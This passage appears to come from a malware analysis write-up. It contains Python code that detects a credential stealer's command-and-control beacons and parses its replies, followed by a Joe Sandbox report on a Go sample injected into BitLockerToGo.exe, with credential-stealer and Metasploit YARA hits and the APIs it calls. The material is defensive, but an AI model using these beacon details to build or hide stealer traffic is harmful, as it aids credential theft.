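        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Return {field name: value} for a multipart/form-data body."""
    fields: Dict[str, bytes] = {}
    for part in body.split(b"--" + boundary.encode()):
        if part.strip() in (b"", b"--"):
            continue  # preamble before the first delimiter, or the closing "--"
        part_headers, _, value = part.partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]+)"', part_headers)
        if m:
            # strip the CRLF that precedes the next delimiter
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def dechunk(body: bytes) -> bytes:
    """Decode a Transfer-Encoding: chunked body (hex size line, data, CRLF, ... , "0")."""
    out, pos = b"", 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        if size == 0:
            return out
        out += body[end + 2:end + 2 + size]
        pos = end + 2 + size + 2


def classify_beacon(raw: bytes) -> Optional[Dict[str, bytes]]:
    """Return the form fields if the request has the captured C2 shape
    (POST /api, multipart/form-data, hwid + pid + lid all present), else None."""
    request_line, headers, body = split_request(raw)
    if not request_line.startswith("POST /api "):
        return None
    m = re.search(r"multipart/form-data;\s*boundary=([^;\s]+)", headers.get("content-type", ""))
    if not m:
        return None
    fields = parse_multipart(body, m.group(1))
    return fields if {"hwid", "pid", "lid"}.issubset(fields) else None


def parse_c2_reply(chunked_body: bytes) -> Optional[str]:
    """Extract the IP echoed in an "ok <ip>" reply, or None if the reply differs."""
    text = dechunk(chunked_body).decode("latin-1").strip()
    m = re.fullmatch(r"ok (\d{1,3}(?:\.\d{1,3}){3})", text)
    return m.group(1) if m else None


if __name__ == "__main__":
    print(classify_beacon(SAMPLE_REQUEST))
    print(parse_c2_reply(SAMPLE_RESPONSE_BODY))
```

The hwid is constant across all four sessions while pid changes (3 in session 4, 1 afterwards), so a detection keyed on the field set and the /api path is more durable than one keyed on the boundary string or the Chrome/119 User-Agent, both of which are trivially changed between builds. The report does not say what the echoed address represents, so the parser only extracts it.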



                                                            Target ID:0
                                                            Start time:17:03:56
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x7ff679810000
                                                            File size:9'048'064 bytes
                                                            MD5 hash:7E37F8C945D005226870E60AA2BAEA93
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:Go lang
                                                            Yara matches:
                                                            • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2354687188.000000C000326000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:17:04:20
                                                            Start date:02/05/2024
                                                            Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                            Imagebase:0xcb0000
                                                            File size:231'736 bytes
                                                            MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2397981986.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2389056869.0000000002E93000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2483917008.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2532039828.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2483286988.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000003.2531513795.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:15.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:23.5%
                                                              Total number of Nodes:306
                                                              Total number of Limit Nodes:10
                                                              execution_graph (rendered graph widget; node and edge data omitted). All nodes lie between 02CF9390 and 02D2D2B2, inside the image dumped at 02CF0000 (see Memory Dump Source below). Windows APIs reached from the graph: LdrInitializeThunk, RtlAllocateHeap, RtlReAllocateHeap, RtlExpandEnvironmentStrings, LoadLibraryW, GetComputerNameExA, GetVolumeInformationW, GetPhysicallyInstalledSystemMemory, GetConsoleWindow, ExitProcess, CryptUnprotectData, SysAllocString, KiUserCallbackDispatcher, GetSystemMetrics, SelectObject, DeleteObject.

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
                                                              • String ID:
                                                              • API String ID: 1449868515-3916222277
                                                              • Opcode ID: 1ef960be1ff11526231f9e0eb4c0a9ae70b112f49b6df5712fcb292756b2d7e3
                                                              • Instruction ID: fcc1faa18083c9380fa0df4ade78b602cb2483e911d00d933a34c99e48ed44f0
                                                              • Opcode Fuzzy Hash: 1ef960be1ff11526231f9e0eb4c0a9ae70b112f49b6df5712fcb292756b2d7e3
                                                              • Instruction Fuzzy Hash: 03A16BB4A14B008FD364DF2CD585A26BBF1FB49700B108A6DE99AC7B60D731B845CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$.$0$[$false$null$true${
                                                              • API String ID: 0-1639024219
                                                              • Opcode ID: 7402a38e10901c23d1dff2bd5ee4ba10f5d9c518661c5b84a7f21568ae438ca8
                                                              • Instruction ID: 7bec225b00aacd30c2f9430787aadab6882e3fdf603892abd16d2d598832c58f
                                                              • Opcode Fuzzy Hash: 7402a38e10901c23d1dff2bd5ee4ba10f5d9c518661c5b84a7f21568ae438ca8
                                                              • Instruction Fuzzy Hash: C51214B4A00346DBEBD05F25DD44726BBE5AF80358F0D8538DA8E87282F7B5D614CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph for the function at 02CF9E70-02CFA508 (rendered graph; basic-block and edge data omitted). Internal calls: 2cf6b00, 2d24c20, 2cf8b30, 2cf96c0 (four call sites), 2cf99c0, 2cfdf60, 2cf8b40. No direct Windows API calls in this function.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: &$>&$*$0$1N$Ar$M-
                                                              • API String ID: 0-3759687519
                                                              • Opcode ID: b2ff3f3caecfca53e7fa99681c275eecf9fabe6f2c525676131829a1ea30a565
                                                              • Instruction ID: 309a2b067a1ff5145c42b2c6b1631c072e08b88c7676e7a70e73b3cb9849badc
                                                              • Opcode Fuzzy Hash: b2ff3f3caecfca53e7fa99681c275eecf9fabe6f2c525676131829a1ea30a565
                                                              • Instruction Fuzzy Hash: 99020FB05083818BE364CF14C494B6BBBF2BBC6348F148D1CE6D54B292D77A9909CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph for the function at 02D16644-02D1710F (rendered graph; basic-block and edge data omitted). Internal calls: 2d2b010 (several call sites), 2cf8b40, 2d1c070. Windows API calls: GetComputerNameExA in the blocks at 2d16ace-2d16b45 and 2d16bdb-2d16c59.
                                                              APIs
                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02D16AF4
                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 02D16BFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: ComputerName
                                                              • String ID: CFZA$jLB
                                                              • API String ID: 3545744682-1295935614
                                                              • Opcode ID: da00a0835e08387636e3cf2447087f66bc6811799a83427c9953aa9fcc3fc6be
                                                              • Instruction ID: 6376f82faea7e6ec3f88634beac5979cfc2154617f036954069fa7b14442543e
                                                              • Opcode Fuzzy Hash: da00a0835e08387636e3cf2447087f66bc6811799a83427c9953aa9fcc3fc6be
                                                              • Instruction Fuzzy Hash: C0328F70145B808AE739CF34C494BE3BBE5BF16309F44499DC4EA8B782D77AA509CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph for the function at 02D16647-02D1710F (rendered graph; basic-block and edge data omitted). Internal calls: 2d2b010 (several call sites), 2cf8b40, 2d1c070. Windows API calls: GetComputerNameExA in the blocks at 2d16abb-2d16b45 and 2d16bdb-2d16c59.
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CFZA$jLB
                                                              • API String ID: 0-1295935614
                                                              • Opcode ID: d9293608b8eb3036a9af5adf0f84f212e8739b2896d948e3135ac176e024b153
                                                              • Instruction ID: 7669cf58a63e6ce5142e0be1aef8f7456851ed583ba706f6066a79f0464df7ba
                                                              • Opcode Fuzzy Hash: d9293608b8eb3036a9af5adf0f84f212e8739b2896d948e3135ac176e024b153
                                                              • Instruction Fuzzy Hash: 29327C70145B808AE739CF34C494BE3BBE5BF16309F48499DC0EA8B782D77AA505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph for the function at 02D15F0E-02D1710F (rendered graph; basic-block and edge data omitted). Internal calls: 2d2b010 (several call sites), 2cf8b40, 2d1c070. Windows API calls: GetComputerNameExA in the blocks at 2d16ace-2d16b45 and 2d16bdb-2d16c59.
                                                              APIs
                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 02D16AF4
                                                              • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 02D16BFF
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: ComputerName
                                                              • String ID: CFZA$jLB
                                                              • API String ID: 3545744682-1295935614
                                                              • Opcode ID: e3d99593c65291955cecab98ec7805857886bbe456d023d992532c7d9180e2fa
                                                              • Instruction ID: 614ca49eb7295f4eae05807fef26841c293a8f7630cb5f3cfcc4c8affed42009
                                                              • Opcode Fuzzy Hash: e3d99593c65291955cecab98ec7805857886bbe456d023d992532c7d9180e2fa
                                                              • Instruction Fuzzy Hash: F4326B70145B809AE729CF34C4A0BE3BBE5BF16308F44499DD4EB8B782D77AA505CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph (rendered graph not preserved): basic blocks 2cfab00-2cfb1dc; no Windows API calls; calls internal subroutines 2cfb220, 2d26b80, 2cffde0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $%$P!_'$g$$uw$y{
                                                              • API String ID: 0-2479004300
                                                              • Opcode ID: 1d271a36b84f1661ec5e9c16704dd33db2610152068f142d5a64ac3299710753
                                                              • Instruction ID: e25779f80cb1ea975c3cb5fedc6c858aebec47afe9525deee02d90ef6ac2068e
                                                              • Opcode Fuzzy Hash: 1d271a36b84f1661ec5e9c16704dd33db2610152068f142d5a64ac3299710753
                                                              • Instruction Fuzzy Hash: A70226B15083918BD3A4CF14C49475BFBE2BBC6348F188E1CEAE55B385D77699098B82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph (rendered graph not preserved): basic blocks 2d0d343-2d0d8f1; calls RtlExpandEnvironmentStrings (four call sites) and internal subroutines 2cf8b30, 2d2be30
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02D0D445
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 02D0D475
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID:
                                                              • API String ID: 237503144-0
                                                              • Opcode ID: b035c5816ad200f22d5db1070d4e96dc3926860180450f3a1caaf06c020902de
                                                              • Instruction ID: 8e2ccb6259f44ee54b5092874ce1a70b15d29a2b3ec6c7590b80d691e7797ad0
                                                              • Opcode Fuzzy Hash: b035c5816ad200f22d5db1070d4e96dc3926860180450f3a1caaf06c020902de
                                                              • Instruction Fuzzy Hash: D60277B0600A018FD324CF29C895B23BBB2FF89314F15865DD8A64BBA5D774E856CBD1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph (rendered graph not preserved): basic blocks 2cf4bb0-2cf5241; no Windows API calls; calls internal subroutines 2cf8b30, 2cf8b40, 2cf8b50, 2cf8d50 (three times), 2cf3500
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: )$IDAT$IEND$IHDR
                                                              • API String ID: 0-3181356877
                                                              • Opcode ID: 6e2ed5527ee63374aee5a1637635908a2850b7cfe353906a4f5ccfb3f8a056c0
                                                              • Instruction ID: a76ada115a39978377b2f6e9e718e96988306dccda65f6cdfc023306afc5d2fd
                                                              • Opcode Fuzzy Hash: 6e2ed5527ee63374aee5a1637635908a2850b7cfe353906a4f5ccfb3f8a056c0
                                                              • Instruction Fuzzy Hash: 88022771A083408FD7A8CF28D89076BBBE1EF95304F05866DEB859B381D775E909CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(02D2BE0C,005C003F,00000006,00120089,?,00000018,ONA@,00000000,02D04E4A), ref: 02D28E96
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: ONA@
                                                              • API String ID: 2994545307-126421097
                                                              • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                              • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                              • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                              • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: K7NK$uFIz
                                                              • API String ID: 2994545307-3383845869
                                                              • Opcode ID: 3506ea996f46498c4aa64bc3be667639afa3045299fe3baa531c31c1896204ce
                                                              • Instruction ID: c718cad6d1af882ae40ec16cace3c66822d40a09209874374da0a67672c45c26
                                                              • Opcode Fuzzy Hash: 3506ea996f46498c4aa64bc3be667639afa3045299fe3baa531c31c1896204ce
                                                              • Instruction Fuzzy Hash: BBC115B1A08301AFD714DF18E89072BB7E2EF85719F18892DE98587781D375ED45CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `
                                                              • API String ID: 0-2679148245
                                                              • Opcode ID: 84a17f0652aeab339cb4e6ed8005525784c4f5e4293006fb0f3fbd590ad37c4d
                                                              • Instruction ID: 9265353cd5d600e43c75607c26675edcbde0e4036c9cb1327a5a5d35100f3b8f
                                                              • Opcode Fuzzy Hash: 84a17f0652aeab339cb4e6ed8005525784c4f5e4293006fb0f3fbd590ad37c4d
                                                              • Instruction Fuzzy Hash: 8C12A5B1908380DBD714EF14E49076BBBE1FB89309F584A2DE9C99B791D738D845CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?), ref: 02D059A3
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID:
                                                              • API String ID: 834300711-0
                                                              • Opcode ID: fbaa496429251621ea00a7fa0b700a16348c26be5dd8ccb30cb54f5206395e32
                                                              • Instruction ID: 1595947c5ef0403a8404fea1f123086a439c0bccc6b693ef8c2898fa29014ef2
                                                              • Opcode Fuzzy Hash: fbaa496429251621ea00a7fa0b700a16348c26be5dd8ccb30cb54f5206395e32
                                                              • Instruction Fuzzy Hash: 7FD0A7F05D0245ABE224DA20CD81F37F3ADEBC5201F11A81AF681D7342C9B0E8014B18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ~}
                                                              • API String ID: 0-3738258182
                                                              • Opcode ID: 7e3214d8ea727d4bc800265c3166da61be51fe6d03e513ea1b512cf59f5f07a9
                                                              • Instruction ID: 9d02c7faef6c9cf4e62080eeaabdbc2ff65dfe6c16c23495f9a9fd9baad2a177
                                                              • Opcode Fuzzy Hash: 7e3214d8ea727d4bc800265c3166da61be51fe6d03e513ea1b512cf59f5f07a9
                                                              • Instruction Fuzzy Hash: 4C51DFB46083418BC724CF19D8617ABB3E2FFC5318F084A1CE8C6AB795E7749941CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c1cf888cb11db739ef1ecf0a31b7f4991e589e8997b8dbf781f2937e07b55db5
                                                              • Instruction ID: 132ab68fbd7d6c27e41a6e7d4221eec068c9ec57b7be451abe625c69d25ffb1f
                                                              • Opcode Fuzzy Hash: c1cf888cb11db739ef1ecf0a31b7f4991e589e8997b8dbf781f2937e07b55db5
                                                              • Instruction Fuzzy Hash: 69919E756083118BDB28CF18C8A176BB7E1FF95318F18491CE8968B3D0E778E945CB96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2db526f53b6d214b12724dc16f6daadd0c4ac2bb7bdff94c50cdf9eccc64ef25
                                                              • Instruction ID: f260c0a2a3be00c8b5392224aa4991c202a97f81b8e1aae37092b09486cf79ba
                                                              • Opcode Fuzzy Hash: 2db526f53b6d214b12724dc16f6daadd0c4ac2bb7bdff94c50cdf9eccc64ef25
                                                              • Instruction Fuzzy Hash: BD619BB16083519BEB14CF14C994B2BBBE6FB9571CF18892DE5856B382D371DC08CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ccdb4ae6fa09c72e2b5e734351d46e9b38519a848ad97f89af03770897365b89
                                                              • Instruction ID: e29ed47d3578d2c7e37e442a48572cf8e87083d0a7815e10783e372ec15fdded
                                                              • Opcode Fuzzy Hash: ccdb4ae6fa09c72e2b5e734351d46e9b38519a848ad97f89af03770897365b89
                                                              • Instruction Fuzzy Hash: E97174B02083519BE724CF14C8A076BB7F2EF85358F00991CE9C99B3A1E779D955CB86
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8288bbeb7f01986c924e509eea7b3d15df59912944f14146e355f02369849c9f
                                                              • Instruction ID: 8a7cfbaea85a2bf1c421d74ac57f77b4aa6d8864e781a76e67b0d2b4b894ee92
                                                              • Opcode Fuzzy Hash: 8288bbeb7f01986c924e509eea7b3d15df59912944f14146e355f02369849c9f
                                                              • Instruction Fuzzy Hash: 5C516970644B009FE3348F14C9A4B63B7F2BB95318F688A0DD5961BB95C3B1F80ACB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3bf0fc8fe527cd11c1c7fc86350f5311ead7aa95cdaaf886dd5cd8b4b3c1c889
                                                              • Instruction ID: 6e4a220cb1a0c86ba4fd06b3a8471c939de9f9a8911e87dd0afecc0520894983
                                                              • Opcode Fuzzy Hash: 3bf0fc8fe527cd11c1c7fc86350f5311ead7aa95cdaaf886dd5cd8b4b3c1c889
                                                              • Instruction Fuzzy Hash: 1721AF71A183019BD7188F14D5A472FBBE2BB85308F948A1DE8C617791C375EC42CBA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2531747935.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_2cf0000_BitLockerToGo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 510331f058a5b840c78e7f88dc09e3592cbdcbf7cfb770ad3c1d7a09406561b4
                                                              • Instruction ID: 209d89831391c7e04639d8351441b9ab3419a7c5d24fe3c3e2f6558b649af9fa
                                                              • Opcode Fuzzy Hash: 510331f058a5b840c78e7f88dc09e3592cbdcbf7cfb770ad3c1d7a09406561b4
                                                              • Instruction Fuzzy Hash: C9F0F2B46087008FC390DF34C18474BBBE2BB88308F608E1CDAAA47B45D375A909CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph (rendered graph not preserved): basic blocks 2d1a923-2d1aa5b; calls SysAllocString
                                                              Similarity
                                                              • API ID: AllocString
                                                              • String ID: Q$S$U$W$Y$[
                                                              • API String ID: 2525500382-2221791194
                                                              • Opcode ID: adf649cfaf91500bd1202c437fadb73459a0f682b7013318e4d308dced158931
                                                              • Instruction ID: 408fea687d50a0364b81a6e7d80d00475d37a41df3c58b0fb3d07cf60e621d30
                                                              • Opcode Fuzzy Hash: adf649cfaf91500bd1202c437fadb73459a0f682b7013318e4d308dced158931
                                                              • Instruction Fuzzy Hash: C741C770108B81CEDB25CF28C498742BFE0AF56314F18868DD8E98F796C775D55ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02D0E03E
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 02D0E06D
                                                              Strings
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: LK$qx$AFG
                                                              • API String ID: 237503144-914270564
                                                              • Opcode ID: ad7f32151364cab03c4e3cba709ae7f1bde572e38fb881dda42c1fb0783a95b5
                                                              • Instruction ID: 128cdb2857e4a03f36a19bc822f950657b568f4cc5d3eb26ef587e6e0ed3afae
                                                              • Opcode Fuzzy Hash: ad7f32151364cab03c4e3cba709ae7f1bde572e38fb881dda42c1fb0783a95b5
                                                              • Instruction Fuzzy Hash: E55150B1108341AFD314CF14C890B5BBBE5EBC5798F108E2DF8A55B391D774D9088B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              APIs
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02D0520D
                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02D0523F
                                                              Strings
                                                              Similarity
                                                              • API ID: EnvironmentExpandStrings
                                                              • String ID: }|s
                                                              • API String ID: 237503144-1039199241
                                                              • Opcode ID: f31b6d3781c27600b2f762e5b32cad65aabd57d32de31c145b4947819c48f6a0
                                                              • Instruction ID: eeaf475708b31a70a24bcb0372972df17413f1f878aa4f037904e572cfae20bf
                                                              • Opcode Fuzzy Hash: f31b6d3781c27600b2f762e5b32cad65aabd57d32de31c145b4947819c48f6a0
                                                              • Instruction Fuzzy Hash: 9A51B0B11043409BD324CF24D895B6BB7E5FF89368F448A1CE9D99B3D1E7B49804CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph
                                                              APIs
                                                              Strings
